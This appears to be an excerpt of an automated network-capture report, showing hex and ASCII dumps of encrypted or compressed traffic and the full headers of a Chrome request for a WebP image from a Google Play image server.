                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: a1 55 97 af 97 97 f3 ec 3a bb ca a9 6f 3a a6 7b 81 16 94 45 3c f0 c6 6d a9 6b ab d4 6d dd ed 8a 97 b7 6d 4d b7 b9 35 57 db 8a aa 1d 80 17 9f a6 9b db 9c 5b 35 6f d4 20 e5 fb 74 f3 78 d6 b9 f5 38 41 05 bf a8 73 53 9d 8a ea e6 00 ca 97 0f 3e 36 bf 4e a9 55 82 a8 80 20 4c 38 d6 be e8 7e 5d a7 8a e0 01 a6 8a b9 db 5e e4 8b 12 20 36 a1 36 b3 56 6b be ce 1e aa 0e a0 b2 eb 7a 7e e5 83 5d 45 c0 42 2a 87 ec d3 50 0e 0e 12 90 2d e7 30 cf 5a 7b e5 44 10 3a 6f e6 ff 79 a1 02 3e ef 1f 82 27 8f 2a c7 fc 1f 57 ae d9 ff bf b6 6d c9 99 73 df 5b a6 7d cb 7b ef 3d 94 a8 45 dd 5c 82 82 cd e4 bd 98 f7 5e c2 de 7b ef bd f7 de 7b af f2 de 57 ad 01 e6 da fb 76 9d 08 3e 54 e1 78 a9 b8 e0 a5 7f f8 c3 23 85 af a8 12 e8 38 9a 4e 7a f1 82 93 fe f0 48 61 cb c5 d1 79 0c a6 67 d0 4d 2f
                                                                                                                                                                                                                                  Data Ascii: U:o:{E<mkmmM5W[5o tx8AsS>6NU L8~]^ 66Vkz~]EB*P-0Z{D:oy>'*Wms[}{=E\^{{Wv>Tx#8NzHaygM/
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: f5 3e e6 da fb dc af d0 5a 5a ca 27 b0 3f b6 ae 04 16 2e 16 58 50 02 8d fb 0b 40 39 f0 b1 b4 a9 b5 86 73 ce 5e 73 f6 1e 13 20 27 db b6 c5 72 c2 cc cc 9c 8a a1 62 e6 8a b1 62 66 66 66 66 66 66 66 a6 8a 99 99 99 99 e9 9f ff 9b b3 47 c1 eb 63 54 8c a0 a0 a7 68 88 8d b5 10 9a 2e 22 8e 8a 5c 51 16 09 71 10 23 11 c1 06 d8 c3 76 a3 21 a6 a2 2f 65 fa 44 45 ca d8 88 84 75 93 6e 8d 44 c4 18 89 88 71 15 31 6b e4 18 48 b7 06 82 dd 71 11 11 13 f0 e3 9e 3c 82 7d ed 72 27 bb 0a 20 87 8c 22 97 52 4a 82 ef 8c 5d b0 a7 81 bc 41 69 cf 80 fa 0e 07 58 46 20 55 54 23 15 80 23 04 e5 0c a5 26 95 06 39 69 b1 bd 96 68 2c 08 53 df e9 71 a8 2c 00 8a ab 2c 4e 02 c4 ea 1a 26 23 90 94 2e 41 d4 9c a6 e6 4d cb 89 68 6a b9 c4 55 a9 60 3c 66 0a f0 c4 e5 02 70 d3 97 09 08 ac a5 e6 65 65 72
                                                                                                                                                                                                                                  Data Ascii: >ZZ'?.XP@9s^s 'rbbfffffffGcTh."\Qq#v!/eDEunDq1kHq<}r' "RJ]AiXF UT##&9ih,Sq,,N&#.AMhjU`<fpeer
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: cf 10 1e 0d 47 59 f3 51 32 0c a6 1a 96 e1 00 ab b0 b4 43 45 e8 c0 c1 58 68 cb e9 4a 19 8a b4 6c ba ea 87 1c 66 2b f3 13 5e 34 50 ca 96 0f f5 a2 da a6 3c 15 cd ca 21 59 33 9b 28 c1 49 1c 74 d7 a0 83 6f d4 10 a8 84 68 dc 6d 57 1c 1b 4d 45 d6 6a a3 d1 3c 92 de 0f 95 c0 ec 60 08 3a c9 ed 61 19 32 04 0b 7a 06 3b f3 3d 8c 3d ee ce ee d2 35 d4 5a ab 1f 1c 5e a7 d3 1b e0 dd 37 57 50 d3 74 57 18 08 a0 cc 34 63 d1 35 d0 00 4a 1b af 99 bb 1f 5c 7f 6c ca cc c7 d6 72 6f ee 9e 07 ee ee f8 8c bb b8 e6 5a 0f f0 36 41 09 65 0f 02 22 4f 5c 49 ef d9 5f 10 40 0b c8 f8 bd 78 7f 58 eb 99 2f 9b 8d 27 4e a6 0b af 97 50 57 06 c0 9b 54 43 21 28 37 15 e0 a6 44 02 68 df 82 d5 49 e6 38 11 02 38 b6 38 37 cd 07 a5 46 00 89 af 68 aa 4e 84 39 27 f0 6b 01 dc 80 79 30 00 74 43 ab 70 67 c9
                                                                                                                                                                                                                                  Data Ascii: GYQ2CEXhJlf+^4P<!Y3(ItohmWMEj<`:a2z;==5Z^7WPtW4c5J\lroZ6Ae"O\I_@xX/'NPWTC!(7DhI8887FhN9'ky0tCpg
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 79 32 62 24 14 d9 6a 00 25 b0 56 4a 2a 83 d7 f7 17 ce cb 14 16 a9 5f 32 c5 18 03 01 cb 57 ee f3 69 8e f0 e0 ee 4c 69 1c da ba 39 53 9b d3 da 0a 83 d4 1c 66 f4 a6 ba 72 6d cf 36 18 00 dc 3c 3c f0 54 ed a5 f7 e8 c1 d3 36 1a 8d 56 46 f4 c9 72 0d 02 f6 9d 7e de b1 7f ae ed 09 90 47 26 12 c2 7b ef 80 1f f0 ac 09 4e d9 9a 58 9a 88 48 6f de 08 e5 c8 29 8d 40 7a 80 34 ca eb 73 7d e4 d7 b8 ac 8e 40 75 a6 01 4e 4b 14 98 af a8 8b 32 b0 02 e8 0d 93 4d 3c bd 04 70 9f ee ab 35 5b b9 02 5b a1 6d 00 51 a2 cd ac 09 74 4a a5 80 c9 0c a8 29 27 ed b8 63 a0 a7 fb f9 c4 06 ad 84 33 65 10 9b 44 1e 35 40 08 8f 1d 44 23 e4 d4 47 d4 4a 11 42 b1 01 f1 68 1d 33 a8 8b 6e 49 d1 10 17 62 ec d4 4b 8f 2c df 3f 28 f3 63 d2 a6 58 c9 8e 39 92 bf ee 78 79 bf d1 0d 3d f7 c2 a8 e7 48 7a 73 93
                                                                                                                                                                                                                                  Data Ascii: y2b$j%VJ*_2WiLi9Sfrm6<<T6VFr~G&{NXHo)@z4s}@uNK2M<p5[[mQtJ)'c3eD5@D#GJBh3nIbK,?(cX9xy=Hzs
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 86 1b 59 b3 d9 6c 1e 19 36 23 2b 24 27 b2 71 d9 0d 17 fc 30 4b f4 db c5 6a d3 3a 47 e4 aa 30 36 a9 b3 a4 c3 cc cd 37 98 37 96 f2 50 41 d3 35 13 82 a4 df 5c 08 33 39 09 7b 0e a2 58 0c d6 d7 b3 31 e4 a0 0e d4 8b 3e 48 f9 41 c9 a5 c9 9d 16 76 56 fa 7c b3 d5 a5 cb 4a 5d 42 45 60 72 0f 1f c4 77 f8 e0 0f 07 6a 1d 58 bb 38 06 34 79 7b 55 a8 af cc 6f 60 7e fd f3 fc c1 99 5f 74 f1 0b c2 2f 31 fe 9c f8 23 e1 0b 05 b8 2a 8f 87 6b e0 1d d0 77 08 ef 54 be 42 f8 fb e9 eb e9 68 10 bc e2 b0 b3 f4 c9 93 3c 31 41 d4 69 82 e3 04 3e 05 e2 d2 16 52 01 31 c0 96 59 38 47 81 a0 05 04 a9 74 82 5c c8 89 58 44 14 22 03 9c 11 86 4c 23 40 00 69 ff ab fe f1 fe ed ff f7 2c 9a 2d 3d e4 dd 73 11 14 b5 af da 8b db 32 94 67 ad 8b 13 5f 78 fb da fa 3e 1a 7e 05 4b 79 ee bd c5 6e f8 ae fb 9f
                                                                                                                                                                                                                                  Data Ascii: Yl6#+$'q0Kj:G0677PA5\39{X1>HAvV|J]BE`rwjX84y{Uo`~_t/1#*kwTBh<1Ai>R1Y8Gt\XD"L#@i,-=s2g_x>~Kyn
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: b0 11 a8 8a 04 8a 07 c7 d8 62 d1 2d 3b 63 8b b6 53 e6 b7 ea 8f c4 fd 6c d1 46 e4 25 73 61 30 93 62 8e 8c 55 f7 08 68 3d ba 5e 13 70 f7 5e e3 f0 89 c4 b9 f9 f3 71 1f 6d f4 e8 1d 8f 7c a6 f1 a1 22 97 c2 05 26 3a 5a b2 9a 10 c8 26 93 c9 ab bf e8 4d 2b 26 45 02 ba d4 7c 91 77 78 2b 47 42 46 b9 81 07 73 33 de 7f b8 db 8d ce 43 bd 4d b7 dd 34 e2 59 db 1e 0a 81 5c 0f 42 f8 e8 86 d1 2a f4 7c 57 55 69 4c 69 ac ce 19 e6 18 e1 cb c2 0b 43 df f3 31 14 29 e6 a0 3f f6 40 22 14 39 f7 0c ee 91 36 5b 90 b2 e7 4c 6b 40 e7 5a 4a 4a 22 64 f8 08 97 16 2f d7 d3 04 67 31 ca bb 6e 92 0c f6 9a be 18 28 18 d4 3d 23 d4 d4 b0 60 b2 8d 41 69 97 f3 65 2c de ea a8 d1 a8 1f 46 7a 96 c6 41 69 16 8b c5 48 c0 9a 6e 7b 71 ab c5 50 e7 7a b8 42 d7 11 d7 5b bc 9f 3d b9 bc f8 40 67 3d 9d e8 71
                                                                                                                                                                                                                                  Data Ascii: b-;cSlF%sa0bUh=^p^qm|"&:Z&M+&E|wx+GBFs3CM4Y\B*|WUiLiC1)?@"96[Lk@ZJJ"d/g1n(=#`Aie,FzAiHn{qPzB[=@g=q
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 51 5a 81 a4 8d a5 fb 02 46 4d 88 5a 65 5e 34 b3 65 30 cd e5 c3 73 73 c6 76 33 55 51 e5 d2 b8 e9 4c 69 5f 53 f5 40 a5 83 bc f9 59 57 3f 44 34 6c 5e 14 db b4 39 df 5a 6c 97 1a af e0 aa 38 0a 97 8a 03 3c b8 a8 8b dd f4 70 fb 54 26 1a 09 75 97 2f 6c 4a 7c eb ad e2 54 9d 9e 8c a1 77 85 0f 8b 2d 41 75 63 23 ac 51 f5 4f 0e dc f8 3f bb ab 61 22 86 d1 25 a0 ba b2 8c 2c 9c 97 c3 6a 4a 5b 78 ce 77 d5 f4 86 6f 9f 97 be f3 fe eb 27 a6 fe 6e 5b 02 8f 9f 0f 7f f7 f4 65 f0 4e f9 cd cb 6f d2 3a b2 05 67 0e 77 42 74 68 e0 e0 23 6a a7 33 9c 71 fa f9 81 b6 8c e7 ce be 3c 51 75 40 9f 73 f4 31 ca 58 9c c3 37 08 01 04 4c ac ec c8 58 69 8d ab 6a 4e 48 de 61 a9 ef 53 6a aa db 11 48 eb 2a 63 31 58 a2 1e 93 ef 9f 7b b2 28 31 c7 74 d1 da 09 88 1d 13 de 40 a6 cd 56 11 2e 37 8b fd e1
                                                                                                                                                                                                                                  Data Ascii: QZFMZe^4e0ssv3UQLi_S@YW?D4l^9Zl8<pT&u/lJ|Tw-Auc#QO?a"%,jJ[xwo'n[eNo:gwBth#j3q<Qu@s1X7LXijNHaSjH*c1X{(1t@V.7
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: af c0 e2 dc 0f 04 cd 19 9c f2 19 4e e1 36 30 36 2f 99 5a 60 4b 82 44 a4 9b 15 8b fb f3 43 05 cb cf 3c 27 aa ff 0e 1e c6 2a 96 f1 10 5c 84 f1 11 3a b2 d6 37 1c af 29 43 c7 87 40 d6 22 8a ca 0e 90 03 f3 3a c5 03 4a 7b 5e 9f fc 8c 0b 1a dc b0 3f 3d cb e3 e7 91 99 27 f7 ad a2 b5 87 c7 2a 70 26 f1 e3 35 cc 48 c0 33 1b 3e 5d f1 5b f8 1a 20 81 42 b8 47 12 88 41 38 10 ce 41 69 fe 9d ed 64 4f 55 92 8c c7 d1 9e 36 24 f7 54 5d c0 3e c7 32 66 f9 cd 2c 19 17 33 77 b2 b5 da cb 5b 49 19 c6 75 59 46 5e 3f 54 f4 dd 10 e5 55 bb 50 85 37 0c 06 8c ee b5 d6 0e 79 0e 60 72 b6 07 61 93 07 93 9f 48 81 2e 73 88 89 92 6e a9 33 be 48 5b 74 e0 50 b5 c7 12 94 81 ae 0a 55 28 41 16 fc 90 90 a4 34 27 0f d9 b2 18 02 62 90 56 a9 50 b4 f4 95 bd 64 9a 40 4e 28 86 11 29 6f 4b e9 cc 6e 46 82
                                                                                                                                                                                                                                  Data Ascii: N606/Z`KDC<'*\:7)C@":J{^?='*p&5H3>][ BGA8AidOU6$T]>2f,3w[IuYF^?TUP7y`raH.sn3H[tPU(A4'bVPd@N()oKnF


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  106192.168.2.649952216.58.212.1504431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1094OUTGET /87mGXAuy0q0oyYxq5DNwHFzCByFtzDjw4clPWAURuOu3kRMcbWlwr0BzNfBNkz2wn2w=w416-h235-rw HTTP/1.1
                                                                                                                                                                                                                                  Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                  Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: fife
                                                                                                                                                                                                                                  Content-Length: 60476
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 03:02:33 GMT
                                                                                                                                                                                                                                  Expires: Mon, 30 Sep 2024 03:02:33 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                  Age: 6673
                                                                                                                                                                                                                                  ETag: "v1"
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC856INData Raw: 52 49 46 46 34 ec 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 08 00 00 00 9f 01 00 ca 00 00 56 50 38 4c eb eb 00 00 2f 9f 81 32 00 4d d0 92 6c db 6e db 60 2d 80 86 ec 75 30 ff 01 df 4b fa 99 7c 47 f4 7f 02 f8 df 7e fe 09 b6 c5 71 2e 9c e4 aa 3a ff 84 2c 2e d5 e1 32 f5 cf f0 a2 45 fa 43 ae a2 6f f0 8d 13 38 89 7e cf ff d3 eb 82 f3 83 eb 8b f3 93 0b ce 0f ae 2f 38 97 83 43 e6 d8 cd c1 21 9e 1c 10 81 cc b1 9b 83 43 e6 20 a8 64 aa 05 50 94 58 4b 94 16 30 19 0b 98 c4 dd 40 a9 33 41 bb 91 01 82 96 8a 40 d1 29 60 60 bc 6d 08 06 76 54 0d 8c 28 50 6e d2 d1 2c d5 25 e1 d6 8d 36 d4 62 06 89 75 9b 97 fb 66 aa 09 96 fb d1 ac 37 7c f2 7e 53 4f c5 8e 29 08 97 a0 d9 99 76 53 e4 7a 3f d4 eb 75 2f e9 cb 33 66 f1 cc 0f 72 ee bb 5a ee d7 2d 7d 3d f7 32 c5 77 ce 5e b8 a4 ed 86
                                                                                                                                                                                                                                  Data Ascii: RIFF4WEBPVP8XVP8L/2Mln`-u0K|G~q.:,.2ECo8~/8C!C dPXK0@3A@)``mvT(Pn,%6buf7|~SO)vSz?u/3frZ-}=2w^
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 04 bd 0b da d1 3b 3c 3c 00 f9 7c e9 fc 99 9f e7 a8 71 87 c3 c2 5c d3 83 9b 5b 94 97 84 2a 42 b8 23 cf be 0c cb 96 c2 2f 0f 23 c7 f9 c1 6d 7d 6e 54 b3 91 67 fd 20 e3 a1 88 27 20 df d2 19 97 72 5a 92 69 cd c6 90 19 8a 55 82 67 45 1b 58 7a 4a 0a 5b 3c 13 74 35 73 82 07 6a e0 ea e7 7f 39 80 7c d5 a9 c8 53 6c 9e 97 b4 38 ef 37 c3 df e3 dd c6 7d 77 ba 8d 5d 76 00 12 11 fb 0f 1d 16 f6 cb 7e 91 c5 56 4d cb b0 25 f3 61 30 95 f9 71 b7 00 90 87 30 4f 85 73 66 cd 57 b9 4b b6 76 58 d1 ce 9b 47 26 00 5a e0 3e e6 46 5e 31 05 7a 42 00 00 20 bf f9 a1 30 ad 6c 53 db 04 99 f7 72 ce 39 2f 2d e3 06 15 00 f9 50 57 a3 52 d5 eb 8e 8a 6c 27 55 50 4f d5 ef bf 99 0f 73 00 a0 dc 48 d5 f4 1f 10 e8 f2 cd 61 00 b4 d1 74 35 d6 06 80 fc 46 90 73 99 4b 92 b5 5a 61 9f af 81 a8 e4 3b 20 6e
                                                                                                                                                                                                                                  Data Ascii: ;<<|q\[*B#/#m}nTg ' rZiUgEXzJ[<t5sj9|Sl87}w]v~VM%a0q0OsfWKvXG&Z>F^1zB 0lSr9/-PWRl'UPOsHat5FsKZa; n
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 6d db 9e b6 91 24 19 82 85 64 ca 6d 60 78 26 ed 30 d3 32 33 33 d3 11 f3 fe 80 dd 23 66 66 66 66 66 66 de 2d d7 65 6e 03 76 6a 4b ba ae da 56 e4 cc 1f 90 23 c2 0d 00 b4 6d 43 f7 06 2c 4b ca 68 fb 7b bb ad 6d 79 1b 69 db b6 7d 3f e0 3c 4f 91 65 3b 71 12 57 a5 52 95 ee 82 e6 be 6e 66 66 66 e6 fb fe 84 df 99 99 99 99 99 99 19 9a b9 aa a1 3a 29 0c 1a 64 c1 09 c7 71 ec db 28 18 d7 88 ee 71 fd 00 59 d3 6d db c6 b6 6d cf 98 73 ed e3 38 cf f3 c2 ad 07 ef a3 d8 b6 6d bb ee 14 d3 f2 2f 52 4e 2d 2d ff c1 4e d1 b6 f9 ea 7b 8d 47 f7 7d 5f 3a cf e3 d8 6b ea 91 6d 5b b5 6d db a9 b5 f5 b1 d6 3e 70 ef e3 2f 66 66 c9 92 72 20 4f 96 5c 4a 83 52 23 eb e7 42 2e 79 4a 00 33 d3 fb 0f 2e df 7b f6 5e 6b f6 16 0e 24 49 52 a2 c4 e1 64 71 58 7b 80 fe 01 00 55 39 8d b5 73 ae db cc 1d
                                                                                                                                                                                                                                  Data Ascii: m$dm`x&0233#ffffff-envjKV#mC,Kh{myi}?<Oe;qWRnfff:)dq(qYmms8m/RN--N{G}_:km[m>p/ffr O\JR#B.yJ3.{^k$IRdqX{U9s
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 8a 4f 3d f1 93 3d 09 88 c8 e9 5d 49 46 52 2a 96 f6 05 88 48 2d 06 38 c8 25 9d 38 09 29 a6 bf 9d cb bc 24 de b0 ba 1b 3b a2 6c cb 1c d3 75 c0 09 4c 6a c4 1a 41 9c c0 ed 75 69 4b a0 a4 63 12 30 ac 0c 25 4e 84 4e 1d 44 17 4e cf b2 60 5e 58 b4 a3 50 53 04 d6 31 82 dc 52 c0 87 0c 94 87 10 f5 95 bc 40 9e 8a fe 9c fa 39 02 36 f1 7c aa 4b 26 81 90 af 98 81 48 67 bc 78 a5 2e 20 c7 5c 95 16 67 1a 44 a8 1d f9 e4 18 85 ec 4c 46 08 ab 42 45 a4 64 36 35 23 88 02 db 23 13 f1 e1 cd a6 0b bb ae 51 a3 c4 2a 59 ea 83 94 8b 5d a6 4c 64 5d a6 6c 48 a0 a4 d5 39 4c 7d e1 08 48 35 4e eb 24 14 f0 54 e4 b2 0b a5 e2 a9 53 7f f1 8d fd a7 9f d1 35 46 00 fa 62 e1 ce aa c7 bf 57 cf 1b 64 8c 16 ac c6 3d f7 f0 95 eb fd 20 5c 8d 6f 9d 5c 97 f9 8a 3f cf d7 24 99 6d 98 ab 71 c5 49 ab 92 4e
                                                                                                                                                                                                                                  Data Ascii: O==]IFR*H-8%8)$;luLjAuiKc0%NNDN`^XPS1R@96|K&Hgx. \gDLFBEd65##Q*Y]Ld]lH9L}H5N$TS5FbWd= \o\?$mqIN
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 6d e9 f1 54 34 91 63 62 11 c6 b5 f7 51 74 21 35 90 32 3b 4a 09 c3 1d ed 7b e3 fe 41 ae 0e b5 0c 69 63 cf 22 47 90 48 9c 1c 15 6b ff 9c a2 d8 86 4c 74 e5 d5 35 8e 42 e3 dd 5c a2 18 21 4a e0 f0 70 05 a4 c4 38 0b e9 e7 61 4f 7d ff c3 be a3 17 c6 a0 7b c1 3b af 61 d5 35 3f 37 6e dc bc d9 0c c0 e1 a1 e9 8f 5d 8e 66 1f 2a e7 6a 63 06 18 e7 7f e8 a1 9a 76 6d ea ce ce b4 25 23 86 3d 75 2a 85 1c ed 4d 13 44 7a e2 c5 b5 20 34 43 2b 95 6d 38 97 38 97 06 31 c3 de cc ef 73 19 77 ac 71 5e ee ba 3e 19 31 3c da 03 44 44 99 a9 18 53 a8 d7 48 68 84 d9 c2 69 4f 17 ca 44 34 ee 9c 66 47 36 65 16 50 4b db 47 5e 7e 4d 7e fe b5 f9 20 94 bf 52 b8 de 5b de fa ba ef 9d ff 2b 22 82 ee fd fd 95 6f 3e fc 92 4d cf 7f fb 9e f9 8f c8 6b 60 81 c0 60 be ef e2 a3 5f 3b e5 f8 4b b5 6d 76 16
                                                                                                                                                                                                                                  Data Ascii: mT4cbQt!52;J{Aic"GHkLt5B\!Jp8aO}{;a5?7n]f*jcvm%#=u*MDz 4C+m881swq^>1<DDSHhiOD4fG6ePKG^~M~ R[+"o>Mk``_;Kmv
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 62 d1 13 93 da 66 b7 c0 09 a4 ea 34 72 be fb 7e f1 f0 af 5d 47 93 ff ee c6 8f 8c e4 82 de f9 ce 52 8b a7 26 57 be e4 99 87 3d fb 3b f7 b7 fc d2 5b 27 5e 3b 83 89 40 b2 84 02 33 b1 f7 51 de fc d7 cc ff ca 53 85 0f 78 a1 f4 cc 16 6e 18 34 d5 7d c8 24 80 d7 3f 96 34 d4 d1 7b 19 fd fe 4f 0e bd 76 16 16 b5 66 db 46 48 7a 56 ba 7b ee 7f e9 3a 7a 38 5b be f8 13 83 27 0e 98 fe fd a5 df 72 31 ff bb 4e 5a bb 5d fb 0c d1 43 10 80 9e bf 2e 6a 3a e6 76 ed fb f3 1d f8 db fb fb 3f ed d1 3e 1d 30 29 62 b5 eb 5f 3c 16 ff e1 65 d5 63 b7 6b de fd d0 10 16 50 a3 99 db ed d0 e9 8e bd c7 31 fc 71 4f 06 ee 39 50 92 7c fc 7d dc f7 05 e7 ae af 7c 58 78 ac 89 b7 14 4f b0 ec 7e 0a c6 f4 82 ed ef 63 e9 bf 8c 4b bf fc 5b 4f 5f 9d e0 b5 6d 76 3e a5 b6 e5 2b 6f ca 1f 77 e4 77 53 c3 ee
                                                                                                                                                                                                                                  Data Ascii: bf4r~]GR&W=;['^;@3QSxn4}$?4{OvfFHzV{:z8['r1NZ]C.j:v?>0)b_<eckP1qO9P|}|XxO~cK[O_mv>+owwS
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: 70 d4 79 5f 3b f4 8e b3 62 2c dd 07 aa 80 0c 40 7c 8c 97 dd a8 91 a2 58 ae b2 ff 9c 01 79 e4 93 b7 74 7a cc 9d 8e 22 01 19 7c e0 8b e6 82 bf be 8f 71 86 de 34 1a ab 16 2f bc 88 9a 47 7d 41 ef 2c e7 4f 8d fc 09 e1 df 8b 90 29 31 05 dd 5b f3 5f d7 fe f5 08 78 c5 da d7 17 98 ed 9e 40 8c 7b 37 34 55 6a cc 53 36 5d 86 0e d3 7f 78 84 f6 7e f0 a3 b1 13 d5 7d a4 24 04 fa e9 6b df b5 a5 b7 8b 3c 78 14 13 7d e5 a0 00 e6 da 94 5b 69 5f 49 e2 73 1b 4c 15 e6 bb bc 84 f7 f1 51 8a fc 77 fa 60 88 f7 92 a5 06 f3 d9 2a 94 3d db ab 6e 55 3e 19 45 32 42 4e fe 23 1b 6e 14 d9 ba 8e a9 11 55 ef c7 74 b3 85 d7 72 17 bb 38 1a 8f 97 93 a9 9c c9 7e 93 90 2d 38 3b 41 bd 1b ae ee be 2d bf f3 78 82 eb 29 f0 69 0e e7 5b 8c e3 a2 b9 02 4d 0d 66 6b 15 72 af d9 3f 8e ea 23 0d b7 46 5a e5
                                                                                                                                                                                                                                  Data Ascii: py_;b,@|Xytz"|q4/G}A,O)1[_x@{74UjS6]x~}$k<x}[i_IsLQw`*=nU>E2BN#nUtr8~-8;A-x)i[Mfkr?#FZ
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: bf 02 8b 01 e8 5a 60 40 ee 1e 4c f7 49 38 57 2d a1 c1 1a 55 14 11 88 65 07 47 87 00 17 21 34 0d 4b c9 fe 35 0c 58 8a 15 75 d4 31 a1 32 d2 a8 ea 01 bc bf 6d 9c 28 43 61 be 6a 93 fd 7a d7 3d 29 2a a4 c1 40 d0 d2 32 a9 b7 75 ad 55 b2 00 0d 68 50 54 82 83 7b 11 8d c1 a2 8b d0 0c 36 5a 07 91 43 87 8b 47 8a 00 c0 24 a8 a7 e7 43 0b a2 92 1c 5b fa 01 d8 44 d5 e0 66 dc 9c 59 33 48 1d e6 2a 16 db 40 89 d5 67 cb 6f 9c 38 1e 0e 50 9b cc 50 53 80 19 9b ed c4 3e 35 62 90 df 8c 83 22 14 08 79 3b 4f d1 4f 81 f3 e8 41 d3 b0 38 01 84 89 82 25 0a 28 d2 27 e3 21 02 30 9b 97 d4 97 4d 6a 3a 31 12 2d 53 c0 a1 2e 4f 28 41 ed ea 6e 69 e4 c3 87 73 c8 76 6e 98 fb 58 ca b3 bc 82 06 a6 02 04 85 1d 66 d9 4a 13 49 76 ec 40 42 7d 6c 8f 2c 65 c1 e5 17 bc 81 11 16 61 c4 2f 69 49 cb 01 56
                                                                                                                                                                                                                                  Data Ascii: Z`@LI8W-UeG!4K5Xu12m(Cajz=)*@2uUhPT{6ZCG$C[DfY3H*@go8PPS>5b"y;OOA8%('!0Mj:1-S.O(AnisvnXfJIv@B}l,ea/iIV
                                                                                                                                                                                                                                  2024-09-29 04:53:46 UTC1390INData Raw: a0 87 74 84 88 74 d0 1d a9 ae 59 f1 cf 4a 11 16 18 8d 45 7f 5a a5 b0 5f 8c 1a f6 e9 b3 03 68 40 0f ab 49 6a 00 82 1a 95 3b dd cf b0 7e dd 3c e9 a6 96 19 7d 99 f3 0e db 70 22 a3 ca 0e 02 1c 52 6c 20 a9 29 9d 54 fa dc 98 0c 86 cb 50 eb ba 36 ed 50 6a 58 d0 7c f7 7c 6f d1 c2 7b 63 6c 8e d6 06 b8 fb 81 3c 1d 34 e7 bd 27 67 9c e9 d3 dc a3 57 00 11 9d 61 c5 2d 08 6d 5a 26 cb 55 5e f4 8e 15 5b 7c a9 1c 6a 28 e5 57 76 bf 46 8d 8c fe 3a 8e b6 8f a5 ec e4 04 26 e8 27 61 36 43 c6 5c 7a 31 a7 1c f3 7b 59 5a ad 7a 93 28 4e e9 41 8f fc c8 4d fa 26 b6 0d 3d cb a9 dc c1 a1 f8 2c 21 61 6b ec ca e6 92 29 de e3 df b3 64 71 bd 67 88 72 c2 d5 7e 57 5a df 69 18 4a 47 5b 6f 18 90 2a ce 40 fb 6f 22 86 36 73 1a 4a fe 2c 01 36 d0 47 33 c6 dd 4f bd f1 78 fd 3f e4 5e 7d 45 a3 48 b2
                                                                                                                                                                                                                                  Data Ascii: ttYJEZ_h@Ij;~<}p"Rl )TP6PjX||o{cl<4'gWa-mZ&U^[|j(WvF:&'a6C\z1{YZz(NAM&=,!ak)dqgr~WZiJG[o*@o"6sJ,6G3Ox?^}EH
